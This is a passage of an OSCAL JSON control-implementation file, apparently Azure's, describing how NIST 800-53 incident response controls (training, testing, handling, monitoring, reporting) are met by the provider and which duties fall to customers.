_x000D_"}],"responsibilities":[{"uuid":"bec70b72-65cb-4cce-a2a0-16bc2009febe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-009"}],"description":"The customer is responsible for providing incident response training, which employs automated mechanisms, to users of customer-deployed resources in accordance with assigned roles and responsibilities.","provided-uuid":"b66f8081-f346-4c1d-8087-83d42dba1037"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"da1bfbbc-b55e-4d9e-98bd-9f4f557f3311","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-3","statements":[{"uuid":"3ad44a67-92cf-4563-8a35-b711c949849b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-3_smt","by-components":[{"uuid":"d6a866b4-1e49-4ed4-8d40-a300c2e89750","export":{"provided":[{"uuid":"221d8114-146e-4af0-8bc2-08b7580513a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-010"}],"description":"Azure tests the incident management capability by using a process that is consistent with the NIST Special Publication 800-61, Revision 2, Computer Security Incident Handling Guide. The Azure incident management capability is exercised by the Security Response Team on a regular basis as security incidents are identified and reported. In addition, Red Team exercises are utilized generally every two weeks to test and identify weaknesses in the incident management process. Lastly, regular mandatory exercises in coordination with contingency planning activities are performed at least annually._x000D_ _x000D_ All issues and action items identified during the exercise are documented in an incident tracking system and worked on until resolved. During the post-exercise phase, lessons learned are discussed and incident management policies and procedures are updated accordingly._x000D_ _x000D_ After the exercises, a post-exercise summary is documented. The post-exercise summary documents the incident ticket number which details how Azure determined there was an incident all the way through the resolution of the incident. Each incident entry is documented in an incident tracking system including identifying the personnel that made updates to the ticket._x000D_ _x000D_ The Security Response Team regularly evaluates response methodology and tools to ensure optimal performance during incidents in Azure as part of the Post incident management (PIR) process._x000D_ _x000D_"}],"responsibilities":[{"uuid":"d23b6b9f-564e-437c-9a3d-5abfd5408a51","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-010"}],"description":"The customer is responsible for testing the incident response capability of customer-deployed resources.","provided-uuid":"221d8114-146e-4af0-8bc2-08b7580513a7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7d755bbd-7e75-482f-9470-1965b0495b10","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-3.2","statements":[{"uuid":"ed1bf364-84ad-4cfa-88f5-1ccd9e0c7e07","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-3.2_smt","by-components":[{"uuid":"440685ff-0930-4c2d-94e6-743a9262eb30","export":{"provided":[{"uuid":"d980bdc4-3cda-4fb4-b74e-71b6777d5de8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-011"}],"description":"The Azure Security Response Team coordinates incident handling activities with contingency planning activities managed by the Business Continuity Management (BCM) team. If incidents or incident management tests trigger Business Continuity and Disaster Recovery (BCDR) plan activation criteria, contingency plans are followed in coordination with the Incident Management SOP._x000D_ _x000D_ Incident response testing activities are also coordinated with service teams through table top and Azure Red Team exercises. These exercises are intended to replicate a real incident and identify weaknesses in the existing incident response processes. If incidents or incident response tests trigger contingency plan activation criteria, contingency plans are followed in coordination with the Incident Management SOP._x000D_ _x000D_"}],"responsibilities":[{"uuid":"19d2da75-eac6-4c31-b7ba-01fbaeb9bd38","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-011"}],"description":"The customer is responsible for coordinating incident response testing with related plans (e.g., business continuity, contingency, disaster recovery).","provided-uuid":"d980bdc4-3cda-4fb4-b74e-71b6777d5de8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b7ba9059-4a3d-4b56-a863-c8a5a55b3739","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-4","statements":[{"uuid":"32543dff-22e8-4440-a1f6-2ab9ac848407","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4_smt.a","by-components":[{"uuid":"f1d4bfc0-c56d-4f7a-bbd2-2e73ba70da84","export":{"provided":[{"uuid":"bf917f60-e65c-4491-8418-b0bdb69364ba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-012"}],"description":"Azure implements a standardized incident handling framework derived from multiple incident handling methodologies including NIST Special Publication 800-61 Revision 2, ISO/IEC 27035:2011, and the SANS Institute publication Computer Security Incident Handling. The Azure C+AI Incident Management process includes multiple stages throughout the resolution of an incident. Incidents may be managed with the Crisis Management or Security Customer Reportable Security or Privacy Incident sub-processes of the overarching Incident Management process. When incidents become triaged as a high severity event (Severity 1 or higher, Severity 0 being the highest) they are managed with the Customer Reportable Security or Privacy Incident sub-process. The process includes steps for preparation, detection and analysis, containment, eradication, and recovery and post-incident activity. Full investigations are conducted by the Security Response Team investigators and are overseen by a Security Incident Manager; this is accomplished through the forensic retrieval of data from affected assets and/or retrieval of relevant event data. Azure ensures individuals that are part of the Security Response Team meet personnel security requirements commensurate with the criticality and sensitivity of the information being processed, stored, and transmitted in Azure. Azure actively plans and implements sustainable security incident management capabilities. incident management activities are reviewed regularly and improvements for infrastructure protection are identified to improve incident management capabilities. Azure ensures individuals that are part of the Security Response Team meet personnel security requirements commensurate with the criticality and sensitivity of the information being processed, stored, and transmitted in Azure. Additionally, Azure reports confirmed security and availability incidents to DoD, US-CERT and affected customers in accordance with applicable policies and procedures."}],"responsibilities":[{"uuid":"5eac72b8-9340-4a9c-b21d-2a68cd3c6abc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-012"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for implementing key incident handling capabilities including preparation, detection and analysis, containment, eradication, and recovery. In addition, incident handling for customer applications is the responsibility of the government agency unless caused by Microsoft or an incident is the result of Microsoft action. The government agency is responsible for providing a point of contact and escalation plan so that Microsoft keeps government staff informed during an incident response.","provided-uuid":"bf917f60-e65c-4491-8418-b0bdb69364ba"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c0e1d562-2a7b-43f6-8ace-e3b81150ab91","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4_smt.b","by-components":[{"uuid":"5b967089-3dbe-4a6e-b2fd-6731fb29eaf6","export":{"provided":[{"uuid":"e69ec0fc-9863-4b26-9db8-f9656a48fd63","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-013"}],"description":"During the incident management assessment stage and throughout the incident handling process, the Security Response Team evaluates the incident's severity and works with the affected service teams to initiate the appropriate Azure Business Continuity Plan (BCP) or Azure Disaster Recovery Plan (DRP). As part of the Enterprise Business Continuity Management (EBCM) process followed by the service teams, the contacts for required incident management processes are included for business continuity and disaster recovery (BCDR). For planned BCDR activities, service teams use Incident Management (IcM) to track the activity. If related to an unplanned incident, the service teams use IcM to track the incident to closure."}],"responsibilities":[{"uuid":"73dfa7a8-015e-4fb5-a55c-46d710d2a9b0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-013"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for coordinating incident handling activities with contingency planning activities for customer-deployed resources.","provided-uuid":"e69ec0fc-9863-4b26-9db8-f9656a48fd63"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"45c0321f-12d1-4818-95ce-46207255ce27","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4_smt.c","by-components":[{"uuid":"7631383d-491b-4aaf-9643-31c03b58d0db","export":{"provided":[{"uuid":"238e3b56-bb2c-4989-b346-1eabde3527f6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-014"}],"description":"As part of IcM, when an incident is resolved, service teams must provide a resolution. When the incident is addressed, the service team with the incident ticket assigned to them resolves the incident and provides the mitigation steps taken to resolve the incident. Service teams can also provide root cause information for optionally correlating the incidents within IcM. For all Severity 0, 1, or 2 incidents, a Post Incident Response (PIR) review is completed by the Security Response Team to determine root cause details and compile a report containing all lessons learned from the incident. The goals of these reviews are to: * Identify technical or communications lapses, procedural failures, manual errors, process flaws that might have caused the Availability Incident or that were identified with a formal PIR * Ensure technical lapses are captured and can be followed up with engineering teams in the form of bugs in their operational databases * Evaluate response procedures for sufficiency and completeness of operating procedures. Additionally, the Incident Manager is accountable for maintaining an inventory of all repair items, their owners, and completion dates. The PIR should contain the following: * Customer/Business Impact * Incident Severity * Root Cause Description * Repair items The concepts derived from the lessons learned, as mentioned above, are consistently incorporated into Microsoft Azure Incident Response training and testing procedures. This is achieved through continuous on-the-job shadow training and annual Strike, Security & Privacy Foundations Training. The ongoing on-the-job shadow training, which involves learning from real incidents, coupled with our annual Strike, Security & Privacy Foundations Training, is meticulously designed to fulfill the intent of the control."}],"responsibilities":[{"uuid":"f58608ea-83ea-4be7-b3b1-71c21d547431","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-014"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for implementing incident handling capabilities that include lessons learned from ongoing incident handling activities; their incorporation into incident response procedures, training, and testing and the implementation of the resulting changes.","provided-uuid":"238e3b56-bb2c-4989-b346-1eabde3527f6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"96ea8e1c-906f-461c-977d-c80cee446db9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4_smt.d","by-components":[{"uuid":"06d80daf-a3a5-405b-a86c-faebd699401f","export":{"provided":[{"uuid":"13efed2c-f58d-471e-98fd-63f3897acdba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-015"}],"description":"The Security Response Team tracks all incidents affecting Azure; collects data about each incident as well as Post Incident Reports; and analyzes the gathered data to enhance the understanding of incident awareness and response across Azure. The team performs monthly metric reviews and weekly post-mortems which correlates incident information and individual incident managements. The monthly metrics provide a better understanding and perspective of the threats against applications, people, and assets. The Azure Incident Management Standard Operating Procedure (SOP) describes the incident handling process for all incidents, including incidents generated by insider threats. Azure Security may engage the Microsoft personnel investigations team to provide support and guidance on forensic investigations when the scope of investigation includes personnel working at Microsoft. Once an incident is identified as suspected insider threat, the Security Incident Manager notifies the Office of Legal Compliance (OLC)."}],"responsibilities":[{"uuid":"8fa5907a-297f-4a37-89f5-4931f9f175f0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-015"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for ensuring the rigor, intensity, scope, and results of incident handling activities are comparable and predictable across the organization.","provided-uuid":"13efed2c-f58d-471e-98fd-63f3897acdba"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"db8f7ea7-205a-46ee-88d4-0892bd969a9a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-4.1","statements":[{"uuid":"0df4c62e-6e28-4a06-a206-f49691839147","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-016"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4.1_smt","by-components":[{"uuid":"75bd5b44-443c-4643-a5dd-fba55bf1d997","export":{"provided":[{"uuid":"3d1318bf-c75f-41d1-ad84-98e9cc2f85ff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-016"}],"description":"Azure employs automated mechanisms, including, but not limited to, service team-specific SharePoint and Microsoft Teams sites, Incident Management (IcM), and Service Now (SNow), the security ticket management system, to support the incident handling process such as alerts, notifications, error messages, or other automated warnings through the audit and accountability processes._x000D_ _x000D_ Upon identification of an incident, service teams create IcM tickets for tracking purposes. The team primarily responsible for resolution takes ownership of the IcM ticket and may create a ticket in Azure DevOps for secondary tracking. These are technical solutions that are available to personnel twenty-four (24) hours a day, seven (7) days a week. Due to the sensitive nature of security incidents, a separate ticketing system, SNow, is employed by the Security Response Team to track and manage security cases. SNow is used in addition to IcM and other tools to provide least privilege and need-to-know implementations._x000D_ _x000D_ If the incident is security related, the service team may transfer ownership of the IcM ticket, use the \"Request Assistance\" feature, or report via email to the Security Response Team twenty-four (24) hours a day, seven (7) days a week._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c48a450e-b655-4c66-a345-606d146201be","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-016"}],"description":"The customer is responsible for employing automated incident handling mechanisms (e.g., ticketing systems and incident tracking/reporting systems).","provided-uuid":"3d1318bf-c75f-41d1-ad84-98e9cc2f85ff"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"070a7a14-bfc3-4f1a-b1bf-616da174257a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-4.2","statements":[{"uuid":"354064e2-0aac-43df-940e-884429200c5e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4.2_smt","by-components":[{"uuid":"e59635ec-1e8f-45e5-8a8c-d3fb594383fc","export":{"provided":[{"uuid":"67fdcd7a-7b06-416c-8d48-8eab70d64190","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-017"}],"description":"Azure personnel are able to access network, data storage, and computing devices within the system and change their configuration as required during the incident management process, up to and including updating firewall rules, restricting network access, removing users, and more. The Security Response Team maintains the capability to dynamically reconfigure information system components as outlined in the Rapid Containment Protocol section of the C+AI Security Playbooks. Capabilities include the ability to disable accounts, change ACLs and quarantine assets if determined necessary in an incident management scenario._x000D_ _x000D_"}],"responsibilities":[{"uuid":"8e2e17d2-eccc-4086-ae28-e3de3b7ad3c3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-017"}],"description":"The customer is responsible for including dynamic reconfiguration of all customer-deployed resources as part of the incident response capability (e.g., filter rules to firewalls and gateways, access control lists).","provided-uuid":"67fdcd7a-7b06-416c-8d48-8eab70d64190"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5a1559cc-71f6-4c74-92cd-aae85860176a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-4.4","statements":[{"uuid":"eba79aa7-ce04-48c7-b946-d2b51ae7f1ee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-018"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4.4_smt","by-components":[{"uuid":"03ceec7f-4366-4f72-bcc4-c23b82d39162","export":{"provided":[{"uuid":"b637d90c-0eab-437c-bcda-12f56f1af52d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-018"}],"description":"The Security Response Team tracks all incidents affecting Azure; collects data about each incident as well as Post Incident Reports; and analyzes the gathered data to enhance the understanding of incident awareness and response across Azure._x000D_ _x000D_ The team performs monthly metric reviews and weekly post-mortems which correlates incident information and individual incident managements. The monthly metrics provide a better understanding and perspective of the threats against applications, people, and assets._x000D_ _x000D_"}],"responsibilities":[{"uuid":"bd2c98d6-7f02-4876-af50-b69d076a0cbb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-018"}],"description":"The customer is responsible for correlating incident information and individual incident responses across the customer organization to achieve perspective on incident awareness and response.","provided-uuid":"b637d90c-0eab-437c-bcda-12f56f1af52d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"058e4299-893e-4571-8846-a44ea7d6fd46","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-4.6","statements":[{"uuid":"7ffb91e8-a583-4d79-ab9f-0a8b815927d1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4.6_smt","by-components":[{"uuid":"106b2f80-1670-47b2-a83d-3cd4992ee13f","export":{"provided":[{"uuid":"3f6e368e-7358-451f-903c-ffeaf0019f36","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-019"}],"description":"The Incident Management SOP describes the incident handling process for all incidents, including incidents generated by insider threats. Azure Security may engage the Microsoft personnel investigations team to provide support and guidance on forensic investigations when the scope of investigation includes personnel working at Microsoft. Once an incident is identified as suspected insider threat, the Security Incident Manager notifies the Office of Legal Compliance (OLC). _x000D_ _x000D_ Additionally, Azure Security may engage the Microsoft Corporate Security team to provide support and guidance on forensic investigations when the scope of investigation includes personnel working at Microsoft to include CorpNet information._x000D_ _x000D_"}],"responsibilities":[{"uuid":"0c7585a1-1527-41ae-a382-690438677f79","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-019"}],"description":"The customer is responsible for implementing an incident handling capability for insider threats.","provided-uuid":"3f6e368e-7358-451f-903c-ffeaf0019f36"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"37dcb37f-12fc-4214-9550-ecb6445b556b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-4.11","statements":[{"uuid":"9bdcc637-683e-45aa-99c4-a74d8c9384b3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-4.11_smt","by-components":[{"uuid":"0c88178a-95f8-4692-a4ea-dd9cc4b62440","export":{"provided":[{"uuid":"2a2c3d91-4b51-4a37-8f4a-f5912b8777f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-020"}],"description":"The Azure Security Response Team consisting of Microsoft Issues & Crisis Management, Security CELA, C+AI Compliance Team, National Security Team, Security Response Team, includes access to forensic/malicious code analysts, tool developers, and operators either directly or within Microsoft to share information and leverage knowledge of various functions to rapidly response to incidents in near real time. Azure locations generally include members of the Security Response Team, but given the interconnected nature of the hyperscale Azure cloud, physical access is rarely required for incident response."}],"responsibilities":[{"uuid":"6aa1835d-0f1f-46bd-902a-7be5232c1f16","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-020"}],"description":"The customer is responsible for establishing and maintaining an integrated incident response team that can be deployed to any location identified by the organization in near real-time.","provided-uuid":"2a2c3d91-4b51-4a37-8f4a-f5912b8777f2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e333777c-a6cc-4329-8025-787a1a02e721","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-5","statements":[{"uuid":"2728e4b9-5bbc-4b6a-8181-cda727adc4e8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-5_smt","by-components":[{"uuid":"51addff7-29a1-4e56-a1b7-8400e959a086","export":{"provided":[{"uuid":"5a890dd7-8a54-4e1b-b38d-804498362ad1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-021"}],"description":"The Azure Security Response Team utilizes the Incident Management (IcM) ticketing system for notification about new alerts. Certain Azure monitoring tools such as Azure Security Monitoring (ASM) create tickets automatically when monitoring for security events. These tickets can be assigned to the Security Response Team as necessary. In other cases, tickets are created as a result of manual log review, incident reporting from service teams, or incident management team research and investigation. Should an IcM alert pass the triage phase without being determined to be a false positive, the Security Response Team creates a case in Service Now (SNow), the security incident tracking tool. Case tickets are updated as more information on the incident is gathered. While not preferred, the Azure Security Response Team monitors a dedicated phone and email alias twenty-four (24) hours a day, seven (7) days a week which can also be used to report suspected security issues. Tickets for events are entered into IcM and SNow and escalated as necessary. This escalation process enables incidents to be escalated to the proper teams. At any point in the escalation path, once the incident has been resolved, the responding support group updates the status of the incident. If it is a customer-related incident, the owner of the incident communicates the resolution of the issue to the customer."}],"responsibilities":[{"uuid":"9213e35f-16e5-4f7e-a3f6-8cfbc8e8c806","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-021"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for tracking and documenting incidents of customer-deployed resources.","provided-uuid":"5a890dd7-8a54-4e1b-b38d-804498362ad1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7539369b-542a-4668-9925-91c7c5ae6d83","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-5.1","statements":[{"uuid":"57faacda-e3f2-49f0-adec-535dc742882f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-5.1_smt","by-components":[{"uuid":"d600f690-264c-47f6-a6c0-3d4fe0b6dddc","export":{"provided":[{"uuid":"d60b058f-1776-4d6a-bd95-f80f0bf9f06b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-022"}],"description":"Incident Management (IcM) collects alerts which are then sent to incident management personnel as needed, who then generate a ticket in Service Now (SNow) to track the incident to resolution._x000D_ _x000D_"}],"responsibilities":[{"uuid":"09110330-daa8-45ae-ac94-1d83cd102628","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-022"}],"description":"The customer is responsible for employing automated mechanisms to assist in incident monitoring to support tracking security incidents and collecting/analyzing incident information.","provided-uuid":"d60b058f-1776-4d6a-bd95-f80f0bf9f06b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"57da4b12-d974-4ce6-96c0-e011a51c0280","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-6","statements":[{"uuid":"c169a3f0-3032-41cb-91ee-f4ef66cb701f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-6_smt.a","by-components":[{"uuid":"42174e9e-23b6-45cc-bbd3-f41ba28a4785","export":{"provided":[{"uuid":"f0081f6f-50b4-405a-ba25-73a17471e571","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-023"}],"description":"All Microsoft personnel are required to immediately report events when they believe that a security incident has occurred. Examples of such events include, but are not limited to: * Alerts, notifications, error messages, or other automated warnings that indicate a security incident may have occurred. * Reports of security incidents received from external parties, including customers, members of the press, or the general public. * Personal observations of anomalies or unexpected events that might indicate a security incident has occurred. * Indication of virus, malicious software or hacker activity. Personnel can report incidents by manually entering event related data directly into the incident management ticketing system which is classified in accordance with NIST Special Publication 800-61 Revision 2 standards based on the Classification, Escalation, and Notification (CEN) Matrix and escalated or by sending email to cdoc@microsoft.com. Tickets are routed automatically to the Security Response Team. Any incident that involves the breach of personal information (PII or above) also requires a notification to the Security team at alias cdoc@microsoft.com. Security then loops in the dedicated Privacy team if needed. Incidents that involve the exposure of information covered by the Microsoft Privacy Policy necessitate the involvement of the Privacy team."}],"responsibilities":[{"uuid":"dee80a94-c1f3-4f4b-a939-fac10a611fb5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-023"}],"description":"The customer is responsible for requiring personnel to report suspected security incidents to the organizational incident management capability within the required time period.","provided-uuid":"f0081f6f-50b4-405a-ba25-73a17471e571"}]},"description":"See inheritance and customer responsibility 